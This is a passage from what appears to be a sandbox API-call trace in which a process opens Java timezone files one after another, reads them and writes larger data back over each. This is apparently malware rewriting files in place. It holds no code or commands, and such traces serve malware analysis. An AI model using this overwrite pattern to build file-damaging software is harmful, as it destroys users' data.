dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.348] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.348] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x314 [0129.348] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.348] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.348] ReleaseMutex (hMutex=0x168) returned 1 [0129.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Matamoros", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Matamoros", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Matamoros", lpUsedDefaultChar=0x0) returned 9 [0129.349] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x314, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x345f2bc*=0x314, lpOverlapped=0x0) returned 1 [0129.350] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0129.351] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x89c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x345f2d0*=0x89c, lpOverlapped=0x0) returned 1 [0129.351] CloseHandle (hObject=0x1d4) returned 1 [0129.351] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\monterrey"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.352] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.352] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x314 [0129.352] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.352] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.352] ReleaseMutex (hMutex=0x168) returned 1 [0129.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Monterrey", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Monterrey", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Monterrey", lpUsedDefaultChar=0x0) returned 9 [0129.352] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x314, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x345f2bc*=0x314, lpOverlapped=0x0) returned 1 [0129.355] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0129.355] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x89c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x345f2d0*=0x89c, lpOverlapped=0x0) returned 1 [0129.355] CloseHandle (hObject=0x1d4) returned 1 [0129.356] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\noronha"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.357] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.357] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x179 [0129.357] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.357] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.357] ReleaseMutex (hMutex=0x168) returned 1 [0129.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Noronha", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Noronha", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Noronha", lpUsedDefaultChar=0x0) returned 7 [0129.358] ReadFile (in: hFile=0x1d4, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x179, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x345f2bc*=0x179, lpOverlapped=0x0) returned 1 [0129.359] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0129.359] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x701, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x345f2d0*=0x701, lpOverlapped=0x0) returned 1 [0129.359] CloseHandle (hObject=0x1d4) returned 1 [0129.360] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\phoenix"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.361] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.361] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x8d [0129.361] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.361] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.361] ReleaseMutex (hMutex=0x168) returned 1 [0129.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Phoenix", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Phoenix", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Phoenix", lpUsedDefaultChar=0x0) returned 7 [0129.362] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f705f8, nNumberOfBytesToRead=0x8d, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f705f8*, lpNumberOfBytesRead=0x345f2bc*=0x8d, lpOverlapped=0x0) returned 1 [0129.363] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0129.363] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x615, lpOverlapped=0x0) returned 1 [0129.363] CloseHandle (hObject=0x1d4) returned 1 [0129.364] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\regina"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.365] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.365] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e1 [0129.365] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0129.365] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.365] ReleaseMutex (hMutex=0x168) returned 1 [0129.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Regina", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Regina", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Regina", lpUsedDefaultChar=0x0) returned 6 [0129.365] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1e1, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x345f2bc*=0x1e1, lpOverlapped=0x0) returned 1 [0129.367] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0129.367] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x769, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x345f2d0*=0x769, lpOverlapped=0x0) returned 1 [0129.367] CloseHandle (hObject=0x1d4) returned 1 [0129.368] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\scoresbysund"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0130.685] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.685] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x410 [0130.685] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.685] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.685] ReleaseMutex (hMutex=0x168) returned 1 [0130.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Scoresbysund", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Scoresbysund", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Scoresbysund", lpUsedDefaultChar=0x0) returned 12 [0130.686] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x345f2bc*=0x410, lpOverlapped=0x0) returned 1 [0130.695] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.695] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x998, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x998, lpOverlapped=0x0) returned 1 [0130.695] CloseHandle (hObject=0x1d4) returned 1 [0130.695] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tegucigalpa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0130.697] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.697] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x79 [0130.697] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.697] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.697] ReleaseMutex (hMutex=0x168) returned 1 [0130.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tegucigalpa", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tegucigalpa", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tegucigalpa", lpUsedDefaultChar=0x0) returned 11 [0130.697] ReadFile (in: hFile=0x1d4, lpBuffer=0x1efe3c8, nNumberOfBytesToRead=0x79, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1efe3c8*, lpNumberOfBytesRead=0x345f2bc*=0x79, lpOverlapped=0x0) returned 1 [0130.698] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.698] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x601, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x601, lpOverlapped=0x0) returned 1 [0130.699] CloseHandle (hObject=0x1d4) returned 1 [0130.699] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\winnipeg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0130.700] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.700] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x618 [0130.700] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.700] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.700] ReleaseMutex (hMutex=0x168) returned 1 [0130.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Winnipeg", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Winnipeg", cchWideChar=8, lpMultiByteStr=0x1f7344c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Winnipeg", lpUsedDefaultChar=0x0) returned 8 [0130.700] ReadFile (in: hFile=0x1d4, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x618, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x345f2bc*=0x618, lpOverlapped=0x0) returned 1 [0130.706] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.706] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x345f2d0*=0xba0, lpOverlapped=0x0) returned 1 [0130.707] CloseHandle (hObject=0x1d4) returned 1 [0130.707] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\McMurdo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mcmurdo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.715] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.715] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x464 [0130.715] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.715] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.715] ReleaseMutex (hMutex=0x168) returned 1 [0130.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="McMurdo", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0130.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="McMurdo", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="McMurdo", lpUsedDefaultChar=0x0) returned 7 [0130.715] ReadFile (in: hFile=0x204, lpBuffer=0x269c668, nNumberOfBytesToRead=0x464, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x345f2bc*=0x464, lpOverlapped=0x0) returned 1 [0130.744] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.744] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9ec, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x9ec, lpOverlapped=0x0) returned 1 [0130.744] CloseHandle (hObject=0x204) returned 1 [0130.744] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\anadyr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0130.829] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.830] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x249 [0130.830] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.830] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.830] ReleaseMutex (hMutex=0x168) returned 1 [0130.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Anadyr", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0130.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Anadyr", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Anadyr", lpUsedDefaultChar=0x0) returned 6 [0130.830] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x249, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x345f2bc*=0x249, lpOverlapped=0x0) returned 1 [0130.831] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.831] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x7d1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x345f2d0*=0x7d1, lpOverlapped=0x0) returned 1 [0130.832] CloseHandle (hObject=0x1f0) returned 1 [0130.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\beirut"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0130.834] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.834] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4b8 [0130.834] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0130.834] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.834] ReleaseMutex (hMutex=0x168) returned 1 [0130.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Beirut", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0130.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Beirut", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Beirut", lpUsedDefaultChar=0x0) returned 6 [0130.835] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x4b8, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x345f2bc*=0x4b8, lpOverlapped=0x0) returned 1 [0130.868] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0130.868] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x345f2d0*=0xa40, lpOverlapped=0x0) returned 1 [0130.868] CloseHandle (hObject=0x1f0) returned 1 [0130.869] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dili"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 